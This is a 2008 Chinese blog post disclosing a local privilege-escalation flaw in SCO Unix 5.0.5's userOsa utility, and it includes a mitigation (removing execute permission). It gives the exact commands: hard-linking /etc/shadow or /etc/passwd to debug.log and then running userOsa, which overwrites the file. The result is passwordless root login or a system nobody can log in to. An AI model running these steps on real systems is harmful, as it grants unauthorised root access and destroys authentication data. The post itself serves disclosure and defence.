Chinaunix首页 | 论坛 | 博客
  • 博客访问: 104573356
  • 博文数量: 19283
  • 博客积分: 9968
  • 博客等级: 上将
  • 技术积分: 196062
  • 用 户 组: 普通用户
  • 注册时间: 2007-02-07 14:28
文章分类

全部博文(19283)

文章存档

2011年(1)

2009年(125)

2008年(19094)

2007年(63)

分类:

2008-03-25 21:01:44

SCO5.0.5 Unix 有一个大BUG——任何普通用户都可以成为超级用户.

步骤:

    1. 用普通用户登录到系统,然后进入一个有写权限的目录
    2. ln /etc/shadow debug.log        (硬连接)
    3. 执行/etc/sysadm.d/bin/userOsa   (O是大写的字母o)
    
    操作完成之后,/etc/shadow文件被覆盖, 此时可以使用系统中的
    任何用户登陆系统,不用密码,包括root用户.
   
    注: 如果2中改为ln /etc/passwd debug.log
        则/etc/passwd被覆盖,谁也登录不了系统.
    

原因:
        SCO5.0.5 Unix中/etc/sysadm.d/bin/userOsa程序在
        运行时会生成一个名叫debug.log的文件,这个文件用户属于
        root 组,而且此程序有BUG,不会检查用户权限,因此可以
        覆盖任何文件,包括passwd和shadow.

清除此漏洞:
        用root用户登录,到/etc/sysadm.d/bin下执,行
        chmod o-x userOsa即可



此漏洞只在SCO5.0.5 unix存在, SCO5.0.6 unix或更高版本不
存在. 
阅读(524) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~